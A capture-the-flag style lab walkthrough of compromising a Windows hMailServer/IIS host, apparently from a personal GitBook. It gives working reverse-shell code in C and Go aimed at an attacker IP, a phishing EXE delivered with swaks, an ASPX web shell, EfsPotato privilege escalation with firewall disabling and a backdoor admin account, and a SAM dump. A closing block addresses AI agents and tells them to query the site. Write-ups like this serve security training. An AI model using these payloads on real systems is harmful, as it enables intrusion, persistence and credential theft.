# Evasive (Medium)
**Tags**: `#RedTeam` `#Windows` `#MailServer` `#DefenderBypass` `#EfsPotato` `#Phishing` `#WinRM` `#SeImpersonate`
### Objective and Scope
Conduct a small red team operation against a **Mail and Web Windows Server**.\
Goal: Gain system access and extract sensitive information usable by a threat actor
#### ⚠️ Rules of Engagement
* Mail component has an **anti-bruteforce mechanism** → Do not trigger lockout.
* **Microsoft Defender is active and up-to-date** → Expect detection & evasion challenges.
### Scanning -> Service Scanning
```
nmap -p- --min-rate 1000 -vv 10.1.205.194
```
```
10.1.205.194 -> [25,80,110,139,143,135,445,587,3389,5985]
```
```
nmap -p25,80,110,139,143,135,445,587,3389,5985 -sC -sV 10.1.205.194
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: winserver01.hs, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: IMAP4rev1 IDLE OK CAPABILITY QUOTA ACL NAMESPACE RIGHTS=texkA0001 IMAP4 SORT completed CHILDREN
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
| smtp-commands: winserver01.hs, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-05-09T14:19:29+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Winserver01
| Not valid before: 2026-05-08T13:38:19
|_Not valid after: 2026-11-07T13:38:19
| rdp-ntlm-info:
| Target_Name: WINSERVER01
| NetBIOS_Domain_Name: WINSERVER01
| NetBIOS_Computer_Name: WINSERVER01
| DNS_Domain_Name: Winserver01
| DNS_Computer_Name: Winserver01
| Product_Version: 10.0.20348
|_ System_Time: 2026-05-09T14:19:21+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: winserver01.hs; OS: Windows; CPE: cpe:/o:microsoft:windows
```
* **SMTP (25/587)** : hMailServer — supports `AUTH LOGIN PLAIN`
* **HTTP (80)** : IIS 10.0
* **POP3/IMAP** : hMailServer
* **SMB (445)** : Available
* **RDP (3389)** : Windows Server
* **WinRM (5985)** : HTTPAPI/2.0
### SMB Enumeration
```
nxc smb 10.1.205.194 -u guest -p '' --shares
```
* We have non-default Interesting share called `docs` and have read permission over it
* Also read access to `IPC$` (RID brute possible)
Crawling the shares
```
nxc smb 10.1.205.194 -u guest -p '' --shares -M spider_plus
```
* There is 2 files both seems pdf let's download it
* `mail_doc.pdf` `old_user_setup_doc.pdf`
* Opening `mail_doc.pdf`
* *Alfonso is expecting an **EXE file from ROGER** via email*
Opening `old_user_setup_doc`. Contains a password.
```
nxc smb 10.1.205.194 -u guest -p '' --rid-brute | grep -i user
```
Password spray didn't worked
```
nxc smb 10.1.205.194 -u user -p pass --continue-on-success
```
But we know user Alfonso is expecting a exe via email maybe this creds are valid on email
### Enumerating Mail Server
Must use **fully qualified email** (`@winserver01.hs`) for authentication. And Validate user with RCPT
```
cat user
roger@winserver01.hs
alfonso@winserver01.hs
```
```
smtp-user-enum -M RCPT -U user -t 10.1.205.194
```
Both users valid.
when we try to send email it says `530 SMTP authentication is required.`
```
swaks -t alfonso@winserver01.hs --from roger@winserver01.hs --attach @a --server 10.1.205.194 --body "Hey There Are you there" --header "Subject: Please Do Note Open This Email"
```
I guess I hit the maximum required email sending quota, and it now says…
```
*** Remote host closed connection unexpectedly.
```
I reset the lab. I found that there was a password in a PDF shared in the docs for new users. I realized I needed to slightly modify the year from 2024 to 2025, and it worked.
```
swaks -t alfonso@winserver01.hs --from roger@winserver01.hs --attach @a --server 10.1.9.239 --body "Hey There Are you there" --header "Subject: Please Do Note Open This Email" -ap
```
I sent a normal file containing the target hostname, but now we can create an .exe file.
* Now we need to craft a exe as `alfonso` is expecting a exe from us (roger)
### Phishing Attempt
* Craft EXE since we know `alfonso` is waiting for roger's exe why not sending a rev shell (: huh
```
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=9001 -f exe --platform windows -o github.exe
```
I sent it, but nothing came back. I started doubting myself, but then I saw in the lab description that Defender is on and up to date.
### Crafting Custom simple exe
```
#include
int main ()
{
int i;
i = system ("ping 10.200.25.221");
i = system ("whoami");
system("powershell ping 10.200.25.221");
return 0;
}
```
```
x86_64-w64-mingw32-gcc test.c -o test.exe
```
```
swaks -t alfonso@winserver01.hs --from roger@winserver01.hs --attach @test.exe --server 10.1.9.239 --body "Hey There Are you there" --header "Subject: Please Do Note Open This Email" -ap
```
Hell YEAH, we got the ping! What a great idea never directly go for a reverse shell.
Now the question is how we can get the shell?
I tried downloading nc.exe and then executing it to get a shell, but although it downloaded, it didn’t give a reverse shell.
```
#include
int main ()
{
int i;
i = system ("powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.200.25.221/nc.exe')\"");
i = system ("whoami");
system("powershell nc.exe 10.200.25.221 445 -e cmd");
return 0;
}
```
But NOO SHELL HUH
I am utilizing the 0xb0b method and it worked out
```
package main
import (
"net"
"os/exec"
)
func main() {
c, _ := net.Dial("tcp", "10.200.25.221:443")
cmd := exec.Command("powershell")
cmd.Stdin = c
cmd.Stdout = c
cmd.Stderr = c
cmd.Run()
}
```
```
GOOS=windows GOARCH=amd64 go build l1nuxkid.go
```
```
swaks -t alfonso@winserver01.hs --from roger@winserver01.hs --attach @l1nuxkid.exe --server 10.1.134.188 --body "Hey There Are you there" --header "Subject: Please Do Note Open This Email" -ap
```
### Shell as alfonso
* Finally it wokred out
```
penelope -p 443
```
### Privilege Escalation > wwwroot
* Poking around, I came across `C:\inetpub\wwwroot`, and I found that we have write access.
* We can drop an ASPX shell there.
{% embed url="" %}
* Now I will use an ASPX reverse shell and use an SMB server to transfer the file.
* Then I will execute it from the website as `abcd.aspx` and gain a reverse shell on port 9090 as `DefaultAppPool`
* Gained Rev Shell as `DefaultAppPool`
* And DefaultAppPool always has SeImpersonatePrivilege. We cannot just drop PrintSpoofer or any Potato executable and run it, because Defender is active and will likely throw our exe miles away.
* One possible method is the EfsPotato exploit. We can compile it on the same machine if a C# compiler is available, and it may also go undetected.
We check for a compiler at `C:\Windows\Microsoft.Net\Framework\` and see that a v4.0 version is present. Nice.
```
dir C:\Windows\Microsoft.Net\Framework\
```
```
PS C:\inetpub\wwwroot> dir C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe
dir C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe
Directory: C:\Windows\Microsoft.Net\Framework\v4.0.30319
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/8/2021 8:16 AM 2141560 csc.exe
```
Next, we download the source file from our attacker machine, compile with the compiler found at `C:\Windows\Microsoft.Net\Framework\v4...` and execute it with the `whoami` command.
```
C:\ProgramData>C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
```
```
C:\ProgramData>.\EfsPotato.exe whoami
```
Bingo, it worked!
Now, to gain a shell, I could reset the admin password, but first let’s turn off the firewall.
```
C:\ProgramData>.\EfsPotato.exe "netsh advfirewall set allprofiles state off"
C:\ProgramData>.\EfsPotato.exe "netsh advfirewall show allprofiles"
C:\ProgramData>.\EfsPotato.exe "netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound"
```
```
State OFF
```
```
.\EfsPotato.exe "net user l1nuxkid StrongPass@123 /add && net localgroup Administrators l1nuxkid /add && net localgroup "Remote Desktop Users" l1nuxkid /add && net localgroup "Remote Management Users" l1nuxkid /add && reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && netsh advfirewall firewall set rule group="remote desktop" new enable=Yes && winrm quickconfig -q && netsh advfirewall firewall set rule group="windows remote management" new enable=Yes"
```
OOPS we passed character limit, do it one by one
```
.\EfsPotato.exe "net user l1nuxkid StrongPass@123 /add"
.\EfsPotato.exe "net localgroup Administrators l1nuxkid /add"
.\EfsPotato.exe "cmd /c net localgroup \"Remote Desktop Users\" l1nuxkid /add"
.\EfsPotato.exe "cmd /c reg add \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
.\EfsPotato.exe "cmd /c netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes"
.\EfsPotato.exe "cmd /c winrm quickconfig -q"
.\EfsPotato.exe "cmd /c netsh advfirewall firewall set rule group=\"windows remote management\" new enable=Yes"
net user l1nuxkid
```
### Shell as l1nuxkid
```
evil-winrm -i 10.1.134.188 -u l1nuxkid -p 'StrongPass@123'
```
### SAM Dump
* I am already a privileged user, but for the sake of formality, I dumped the SAM database to become an administrator. I could have just used PsExec and become NT AUTHORITY.
```
nxc smb 10.1.134.188 -u l1nuxkid -p 'StrongPass@123' --sam
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/hacksmarter-labs/evasive-medium.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.